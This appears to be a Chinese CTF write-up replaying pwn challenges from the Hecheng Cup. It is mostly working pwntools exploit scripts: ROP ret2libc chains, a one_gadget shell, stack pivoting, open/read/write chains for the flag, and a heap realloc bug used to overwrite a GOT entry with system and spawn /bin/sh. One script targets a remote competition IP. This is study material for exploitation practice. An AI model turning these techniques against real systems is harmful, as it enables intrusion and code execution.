鹤城杯复现

babyof

思路如下,简单题

from pwn import *

#p = process("./babyof")
p = remote("182.116.62.85",29394)
#gdb.attach(p)
elf = ELF("./babyof")
libc = ELF("/lib/x86_64-linux-gnu/libc-2.27.so")
rdi = 0x0000000000400743
payload = "a"*0x48 + p64(rdi) + p64(elf.got["puts"]) + p64(elf.plt["puts"]) + p64(0x40066B)
p.sendlineafter("Do you know how to do buffer overflow?",payload)
p.recvuntil("I hope you win\n")
libc_base = u64(p.recv(6).ljust(8,"\x00")) - libc.sym["puts"]
log.info("libc_base: " + hex(libc_base))

og = 0x4f3c2 + libc_base#0x4f365 0x4f3c2 0x10a45c
payload = "a"*0x48 + p64(og)
p.sendlineafter("Do you know how to do buffer overflow?",payload)
p.interactive()

littleof

思路和前面差不多

easyecho

没什么stack smash

from pwn import *

p = process("./pwn")

p.recvuntil("Name:")
p.sendline("a"*0x10)
p.recvuntil("a"*0x10)
pie = u64(p.recv(6).ljust(8,"\x00")) - 0xcf0
fail = 0x000000000000EBD + pie
flag_ad = 0x202040 + pie
log.info("ad: " + hex(pie))
payload = "backdoor"
p.sendlineafter("Input:",payload)
#gdb.attach(p)
payload = "a"*0x88 + p64(fail) + p64(flag_ad)*500
p.sendlineafter("Input:",payload)

p.sendlineafter("Input:","exitexit")
p.interactive()

onecho

两种做法
1.跳主函数orw
2.栈迁移

解法1

这个题有点点奇怪必须要先p32(p1) + p32(1) * 4(替换城p32(ebx) + p32(bss)就第一次可以)

from pwn import *

#context.log_level = "debug"

libc_path = "/home/archer/glibc-all-in-one/libs/2.31-0ubuntu9.2_i386/libc-2.31.so"
ld = "/home/archer/glibc-all-in-one/libs/2.31-0ubuntu9.2_i386/ld-2.31.so"

p = process([ld,"./onecho"],env = {"LD_PRELOAD":libc_path})

libc = ELF("/home/archer/glibc-all-in-one/libs/2.31-0ubuntu9.2_i386/libc-2.31.so")
p.recvuntil("Input your name:")
puts_ad = 0x08049180
puts_got = 0x0804BFC8
main_ad = 0x0804973F
bss = 0x804c000
p1 = 0x08049810#pop ebx ; pop esi ; pop edi ; pop ebp ; ret
p2 = 0x08049812#pop edi ; pop ebp ; ret
p3 = 0x08049811#pop esi ; pop edi ; pop ebp ; ret
ebx = 0x08049022#pop ebx ; ret

payload = b"a" * 0x100 + b"a" * 0x10 + p32(p1) + p32(1)*4 + p32(puts_ad) + p32(main_ad)
payload += p32(puts_got)
p.sendline(payload)

libc_base = u32(p.recvuntil("\xf7")[-4:]) - libc.sym["puts"]
op = libc_base + libc.sym["open"]
read = libc_base + libc.sym["read"]
write = libc_base + libc.sym["write"]
malloc_hook = libc_base + libc.sym["__malloc_hook"]
log.info("libc_base: " + hex(libc_base))
log.info("malloc_hook: " + hex(malloc_hook))
free_hook = libc_base + libc.sym['__free_hook']
p.recvuntil("Input your name:")
payload = b"a"*0x110 + p32(p1) + p32(1)*4 + p32(read) + p32(main_ad)
payload += p32(0) + p32(malloc_hook) + p32(0x10)
p.sendline(payload)
p.send("flag")

p.recvuntil("Input your name:\n")
payload = b"a"*0x110 + p32(p1) + p32(0x1)*4 + p32(op) + p32(main_ad)
payload += p32(malloc_hook)
p.sendline(payload)

p.recvuntil("Input your name:\n")
payload = b"a"*0x110 + p32(p1) + p32(0x1)*4 + p32(read) + p32(main_ad)
payload += p32(3) + p32(bss + 0x110) + p32(0x30)
p.sendline(payload)

p.recvuntil("Input your name:\n")
payload = b"a"*0x110 + p32(p1) + p32(0x1)*4 + p32(write) + p32(main_ad)
payload += p32(1) + p32(bss + 0x110) + p32(0x30)
p.sendline(payload)

p.interactive()

解法2

from pwn import *

#context.log_level = "debug"

libc_path = "/home/archer/glibc-all-in-one/libs/2.31-0ubuntu9.2_i386/libc-2.31.so"
ld = "/home/archer/glibc-all-in-one/libs/2.31-0ubuntu9.2_i386/ld-2.31.so"

p = process([ld,"./onecho"],env = {"LD_PRELOAD":libc_path})
elf = ELF("./onecho")
libc = ELF("/home/archer/glibc-all-in-one/libs/2.31-0ubuntu9.2_i386/libc-2.31.so")

bss = 0x804c000
ebp = 0x804c000#  pop ebp ; ret
le = 0x080492a5#  leave   ; ret 
p1 = 0x08049810#  pop ebx ; pop esi ; pop edi ; pop ebp ; ret
p2 = 0x08049022#  pop ebx ; ret
p3 = 0x08049812#  pop edi ; pop ebp ; ret
p4 = 0x08049811#  pop esi ; pop edi ; pop ebp ; ret

payload = b"a"*0x110 + p32(p1) + p32(1)*4
payload += p32(elf.plt["puts"]) + p32(p2) + p32(elf.got["puts"])
payload += p32(elf.plt["read"]) + p32(p1) + p32(0) + p32(bss + 0x500) + p32(0x100)
payload += p32(bss + 0x500) + p32(le) + p32(bss+0x500)
p.sendlineafter("Input your name:\n",payload)
libc_base = u32(p.recvuntil("\xf7")[-4:]) - libc.sym["puts"]
op = libc_base + libc.sym["open"]
log.info("libc_base: " + hex(libc_base))
rax = 0x0002c2d2+libc_base

flag_ad = bss + 0x500 + 0x30
payload = p32(0) + p32(op) + p32(p2) + p32(flag_ad)
payload += p32(elf.plt["read"]) + p32(p4)
payload += p32(3) + p32(bss+0x300) + p32(0x30)
payload += p32(elf.plt["puts"]) + p32(0) + p32(bss+0x300) + b"flag\x00"

p.send(payload)
p.interactive()

supremarket

edit函数中有个realloc那里存在漏洞,发现了就能出

from pwn import *

p = process("./pwn")

#context.log_level = "debug"
libc = ELF("/lib/i386-linux-gnu/libc-2.23.so")
def add(name,price,size,des):
	p.recvuntil("your choice>> ")
	p.sendline("1")
	p.recvuntil("name:")
	p.sendline(name)
	p.recvuntil("price:")
	p.sendline(str(price))
	p.recvuntil("descrip_size:")
	p.sendline(str(size))
	p.recvuntil("description:")	
	p.sendline(des)

def free(name):
	p.recvuntil("your choice>> ")
	p.sendline("2")
	p.recvuntil("name:")
	p.sendline(name)

def show():
	p.recvuntil("your choice>> ")
	p.sendline("3")

def cd(name,price):
	p.recvuntil("your choice>> ")
	p.sendline("4")
	p.recvuntil("name:")
	p.sendline(name)
	p.recvuntil("input the value you want to cut or rise in:")
	p.sendline(str(price))

def dc(name,size,des):
	p.recvuntil("your choice>> ")
	p.sendline("5")
	p.recvuntil("name:")
	p.sendline(name)
	p.recvuntil("descrip_size:")
	p.sendline(str(size))
	p.recvuntil("description:")	
	p.sendline(des)

add("a",20,0x80,"a")
add("b",20,0x20,"b")
dc("a",0xb0,"\x00")
add("c",20,0x10,"qqqq")
dc("a",0x50,"b"*4 + p32(0)*3 + p32(0x14) + p32(0x10) + p32(0x0804B048) + p32(0x21))
show()
p.recvline()
p.recvline()
p.recvline()
p.recvuntil("des.")
ad = u32(p.recv(4)) - libc.sym["atoi"]
log.info("libc_base: " + hex(ad))
sys_ad = ad + libc.sym["system"]
log.info("atoi: " + hex(ad + libc.sym["atoi"]))

dc("bbbb",0x10,p32(sys_ad))
p.sendline("/bin/sh\x00")
p.interactive()